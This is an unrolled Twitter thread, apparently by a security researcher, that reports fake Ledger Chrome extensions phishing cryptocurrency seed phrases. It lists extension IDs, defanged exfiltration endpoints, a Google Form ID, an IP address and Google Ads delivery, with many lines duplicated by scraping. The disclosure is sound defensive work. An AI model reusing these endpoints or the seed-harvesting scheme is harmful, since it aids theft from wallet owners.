⚠️ Four more @Ledger browser extensions. A thread...

cc: @Ledger @Ledger_Support @googledevs

#cryptocurrency #security #phishing https://twitter.com/sniko_/status/1236346777814601728
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)

Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: pbilbjpkfbfbackdcejdmhdfgeldakkn (6 users)Asks for seed phrases, posts to backend hosted at ledger[.]productions/api_v1/ (cc: @Cloudflare)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)

Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: lfaahmcgahoalphllknbfcckggddoffj (101 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)

Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: dehindejipifeaikcgbkdijgkbjliojc (31 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)

Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Extension ID: bhkcgfbaokmhglgipbppoobmoblcomhh (119 users)Asks for seed phrases, posts to a @googledocs form (ID: 1FAIpQLSc1DTYAqXYnGTaUH0AIJa-rC2lk7V5nsE6tEdGIKXTKNm36HQ)
Delivered via @GoogleAds again, like the linked tweet in the OP
Delivered via @GoogleAds again, like the linked tweet in the OP
Delivered via @GoogleAds again, like the linked tweet in the OP
. @ZDNet coverage of the previous fake extensions - some of these function the same (using GoogleDocs) but some don't - though the are similar

I recommend reading the writeup by @campuscodi in the linked tweet for a full understanding of what's happening https://twitter.com/MyCrypto/status/1236090921373990912
⚠️Another Ledger extension on the Chrome webstore

Extension ID: opmelhjohnmenjibglddlpmbpbocohck (~71 users)

Asks for seed phrases, posts to completssl[.]com/ssnd_t.php

Same backend as this Trezor one https://twitter.com/sniko_/status/1243917603745267712

cc: @ChromiumDev @Ledger @Ledger_Support
Another Ledger extension on the Chrome webstoreExtension ID: opmelhjohnmenjibglddlpmbpbocohck (~71 users)Asks for seed phrases, posts to completssl[.]com/ssnd_t.phpSame backend as this Trezor one https://twitter.com/sniko_/status/1243917603745267712cc: @ChromiumDev @Ledger @Ledger_Support
Another Ledger extension on the Chrome webstoreExtension ID: opmelhjohnmenjibglddlpmbpbocohck (~71 users)Asks for seed phrases, posts to completssl[.]com/ssnd_t.phpSame backend as this Trezor one https://twitter.com/sniko_/status/1243917603745267712cc: @ChromiumDev @Ledger @Ledger_Support
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension

Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)

Website: myledgernano[.]com (cc: @Cloudflare)

Sends phished seed phrases to POST /device/init/payload
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)Website: myledgernano[.]com (cc: @Cloudflare)Sends phished seed phrases to POST /device/init/payload
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)Website: myledgernano[.]com (cc: @Cloudflare)Sends phished seed phrases to POST /device/init/payload
More @Ledger phishing delivered via @GoogleAds - A website and a Chrome extension Extension ID: opmelhjohnmenjibglddlpmbpbocohck (see tweet above)Website: myledgernano[.]com (cc: @Cloudflare)Sends phished seed phrases to POST /device/init/payload
173.212.230.221 is hosting suspicious domains (myledgernano[.]com originally pointed here before hiding behind Cloudflare)

Domains targetting @Trezor and @Ledger customers (cc: @Mutex_Lock)

https://pastebin.com/raw/CawRZkyw 
⚠️ Another fake Ledger extension on the Chrome webstore

Extension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)

Asks for seed phrases, posts to completssl[.]com/ssnd_1.php

Delivered via @GoogleAds

https://twitter.com/sniko_/status/1243946328520118273

cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstoreExtension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)Asks for seed phrases, posts to completssl[.]com/ssnd_1.phpDelivered via @GoogleAds https://twitter.com/sniko_/status/1243946328520118273cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstoreExtension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)Asks for seed phrases, posts to completssl[.]com/ssnd_1.phpDelivered via @GoogleAds https://twitter.com/sniko_/status/1243946328520118273cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstoreExtension ID: mjbimaghobnkobfefccnnnjedoefbafl (~100 users)Asks for seed phrases, posts to completssl[.]com/ssnd_1.phpDelivered via @GoogleAds https://twitter.com/sniko_/status/1243946328520118273cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore

Extension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)

Asks for seeds, posts to usermetrica[.]org/api_v1

cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstoreExtension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)Asks for seeds, posts to usermetrica[.]org/api_v1cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstoreExtension ID: ddohdfnenhipnhnbbfifknnhaomihcip (~261 users)Asks for seeds, posts to usermetrica[.]org/api_v1cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstore

Extension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)

Asks for seeds, posts to usermetrica[.]org/api_v1

cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstoreExtension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)Asks for seeds, posts to usermetrica[.]org/api_v1cc: @ChromiumDev @Ledger @Ledger_Support
And another fake Ledger extension on the Chrome webstoreExtension ID: dbcfhcelmjepboabieglhjejeolaopdl (~272 users)Asks for seeds, posts to usermetrica[.]org/api_v1cc: @ChromiumDev @Ledger @Ledger_Support
Another fake Ledger extension on the Chrome webstore

Extension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)

Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minifed their JS and tried to obfuscate it

cc: @Ledger @Ledger_Support

#malware #bitcoin
Another fake Ledger extension on the Chrome webstoreExtension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minifed their JS and tried to obfuscate itcc: @Ledger @Ledger_Support #malware #bitcoin
Another fake Ledger extension on the Chrome webstoreExtension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minifed their JS and tried to obfuscate itcc: @Ledger @Ledger_Support #malware #bitcoin
Another fake Ledger extension on the Chrome webstoreExtension ID: mciddpldhpdpibckghnaoidpolnmighk (~535 users)Asks for seeds, posts to walletbalance[.]org/api_v1/ - though, they've minifed their JS and tried to obfuscate itcc: @Ledger @Ledger_Support #malware #bitcoin
Another fake Ledger extension on the Chrome website

Extension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)

Asks for seeds, posts to completssl[.]com/ssnd_1.php

cc: @Ledger @Ledger_Support

#malware #bitcoin
Another fake Ledger extension on the Chrome websiteExtension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)Asks for seeds, posts to completssl[.]com/ssnd_1.phpcc: @Ledger @Ledger_Support #malware #bitcoin
Another fake Ledger extension on the Chrome websiteExtension ID: agfjbfkpehcnceblmdahjaejpnnnkjdn (~67 users)Asks for seeds, posts to completssl[.]com/ssnd_1.phpcc: @Ledger @Ledger_Support #malware #bitcoin
Another fake Ledger extension on the Chrome website - pushed via Google Ads

Extension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)

Asks for seeds, posts to usermetrica[.]org/api_v1/

cc: @Ledger @Ledger_Support @ChromiumDev

#malware #bitcoin
Another fake Ledger extension on the Chrome website - pushed via Google AdsExtension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)Asks for seeds, posts to usermetrica[.]org/api_v1/cc: @Ledger @Ledger_Support @ChromiumDev #malware #bitcoin
Another fake Ledger extension on the Chrome website - pushed via Google AdsExtension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)Asks for seeds, posts to usermetrica[.]org/api_v1/cc: @Ledger @Ledger_Support @ChromiumDev #malware #bitcoin
Another fake Ledger extension on the Chrome website - pushed via Google AdsExtension ID: mcbcknmlpfkbpogpnfcimfgdmchchmmg (~0 users)Asks for seeds, posts to usermetrica[.]org/api_v1/cc: @Ledger @Ledger_Support @ChromiumDev #malware #bitcoin
I've been quiet on this thread (and similar others) but still we are finding more and issuing takedowns.

A new malicious @Ledger extension has changed and started using Telegram as their c2...

Not the first time we are flooding a c2 - see quoted thread

https://twitter.com/sniko_/status/1202990606638878720
You can follow @sniko_.
Tip: mention @twtextapp on a Twitter thread with the keyword “unroll” to get a link to it.

Latest Threads Unrolled:
There are a lot of misconceptions about the Turkish diaspora in Germany. Since i just finished writing an essay about this topic I thought it's time to give other people
Read more
Las mejores calculadoras online en 2020A thread http://totumat.com/2020/11/26/las-mejores-calculadoras-online-en-2020/ Cuando se estudian asignaturas que requieren de cálculos complicados, nada mejor que contar con una buena calculadora.
Read more
Mitigating #ClimateChange is as much about taking up new techs as about leaving others behindMost studies focus on #coal's global downfall but another #energy tech decline is loomingRead my new
Read more